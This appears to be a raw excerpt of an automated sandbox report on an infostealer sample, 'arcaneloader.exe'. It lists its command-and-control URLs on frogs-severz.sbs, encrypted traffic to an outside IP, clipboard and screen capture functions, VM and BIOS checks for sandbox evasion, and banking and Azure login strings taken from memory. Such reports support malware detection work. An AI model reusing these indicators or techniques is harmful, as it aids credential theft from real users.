                  Source: arcaneloader.exe, 00000003.00000003.2347314866.000000000326A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2239078589.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238614584.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
                  Source: arcaneloader.exe, 00000003.00000003.2347314866.000000000320A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000002.2349286243.00000000031F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
                  Source: arcaneloader.exe, 00000003.00000003.2286841337.000000000326C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiS
                  Source: arcaneloader.exe, 00000003.00000003.2238399885.00000000057B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apigoN0T
                  Source: arcaneloader.exe, 00000003.00000003.2262709670.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238399885.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2239078589.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238614584.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiiF
                  Source: arcaneloader.exe, 00000003.00000003.2195949369.0000000003270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apikB
                  Source: arcaneloader.exe, 00000003.00000003.2286841337.000000000326C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/cl
                  Source: arcaneloader.exe, 00000003.00000003.2195949369.0000000003277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/mB
                  Source: arcaneloader.exe, 00000003.00000002.2349286243.00000000031F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/apial
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: arcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: arcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: arcaneloader.exe, 00000003.00000003.2240520662.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                  Source: arcaneloader.exe, 00000003.00000003.2240520662.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: arcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                  Source: arcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                  Source: arcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.6:49746 version: TLS 1.2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004353C0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004353C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004353C0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004353C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00435540 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00435540
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBF4D00_2_00DBF4D0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC34D00_2_00DC34D0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBF9800_2_00DBF980
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC15A00_2_00DC15A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DB86C00_2_00DB86C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBCE700_2_00DBCE70
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DD1FD20_2_00DD1FD2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBD7F00_2_00DBD7F0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041C8CA3_2_0041C8CA
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004269C23_2_004269C2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043A1C03_2_0043A1C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042F2463_2_0042F246
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040B2703_2_0040B270
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004222F03_2_004222F0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043CAB03_2_0043CAB0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040D4873_2_0040D487
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040ED413_2_0040ED41
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042EDFB3_2_0042EDFB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004295903_2_00429590
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004425A03_2_004425A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040F6C03_2_0040F6C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043F6C23_2_0043F6C2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00442EF03_2_00442EF0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00408F403_2_00408F40
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043FF4D3_2_0043FF4D
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041C0583_2_0041C058
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004198603_2_00419860
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041D8623_2_0041D862
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042B8203_2_0042B820
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004410E03_2_004410E0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042A0803_2_0042A080
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041B8883_2_0041B888
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004428B03_2_004428B0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004321423_2_00432142
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042A93A3_2_0042A93A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004071C03_2_004071C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004411C03_2_004411C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041E1D03_2_0041E1D0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004039E03_2_004039E0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004061E03_2_004061E0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004099F03_2_004099F0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040598A3_2_0040598A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004399B03_2_004399B0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043DA603_2_0043DA60
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00429A103_2_00429A10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043D2C03_2_0043D2C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00432A923_2_00432A92
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00402AB03_2_00402AB0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004273583_2_00427358
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00442BD03_2_00442BD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041B3823_2_0041B382
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004043903_2_00404390
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004333903_2_00433390
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00429BAB3_2_00429BAB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004274553_2_00427455
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00425C1F3_2_00425C1F
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042C4303_2_0042C430
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00407CD03_2_00407CD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00431CF83_2_00431CF8
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0040BD133_2_0040BD13
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00406D303_2_00406D30
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042DDD63_2_0042DDD6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00428DDC3_2_00428DDC
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042ADF03_2_0042ADF0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041A5833_2_0041A583
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042FD863_2_0042FD86
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00440E403_2_00440E40
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041AE583_2_0041AE58
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004416603_2_00441660
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004206703_2_00420670
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00409E303_2_00409E30
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042F6C53_2_0042F6C5
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00425EEB3_2_00425EEB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00438EEE3_2_00438EEE
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004066A03_2_004066A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0042EDF63_2_0042EDF6
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004397503_2_00439750
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043AF573_2_0043AF57
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00422F5C3_2_00422F5C
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00440F703_2_00440F70
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00440FCA3_2_00440FCA
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00402FD03_2_00402FD0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00420FE03_2_00420FE0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_004237E53_2_004237E5
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00426F803_2_00426F80
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0041F7A03_2_0041F7A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBF9803_2_00DBF980
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBF4D03_2_00DBF4D0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC34D03_2_00DC34D0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC15A03_2_00DC15A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DB86C03_2_00DB86C0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBCE703_2_00DBCE70
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DD1FD23_2_00DD1FD2
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBD7F03_2_00DBD7F0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: String function: 00419850 appears 65 times
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: String function: 00408820 appears 41 times
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: String function: 00DC8178 appears 36 times
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: String function: 00DC55C0 appears 66 times
                  Source: arcaneloader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: arcaneloader.exeStatic PE information: Section: .coS ZLIB complexity 1.0003296675955413
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@2/1
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043A1C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043A1C0
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
                  Source: arcaneloader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\arcaneloader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: arcaneloader.exe, 00000003.00000003.2196929232.00000000057D8000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2197303041.00000000057BA000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2218738323.00000000057D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: arcaneloader.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile read: C:\Users\user\Desktop\arcaneloader.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\arcaneloader.exe "C:\Users\user\Desktop\arcaneloader.exe"
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess created: C:\Users\user\Desktop\arcaneloader.exe "C:\Users\user\Desktop\arcaneloader.exe"
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess created: C:\Users\user\Desktop\arcaneloader.exe "C:\Users\user\Desktop\arcaneloader.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: arcaneloader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: arcaneloader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: arcaneloader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: arcaneloader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: arcaneloader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: arcaneloader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: arcaneloader.exeStatic PE information: section name: .00cfg
                  Source: arcaneloader.exeStatic PE information: section name: .coS
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC4BC5 push ecx; ret 0_2_00DC4BD8
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC4BC5 push ecx; ret 3_2_00DC4BD8
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC4CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DC4CA2
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\arcaneloader.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exe TID: 2300Thread sleep time: -210000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exe TID: 2300Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DCC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00DCC7DB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DCC72A FindFirstFileExW,0_2_00DCC72A
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DCC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00DCC7DB
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DCC72A FindFirstFileExW,3_2_00DCC72A
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000002.2349286243.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2347314866.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000002.2349286243.000000000320A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2347314866.000000000320A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
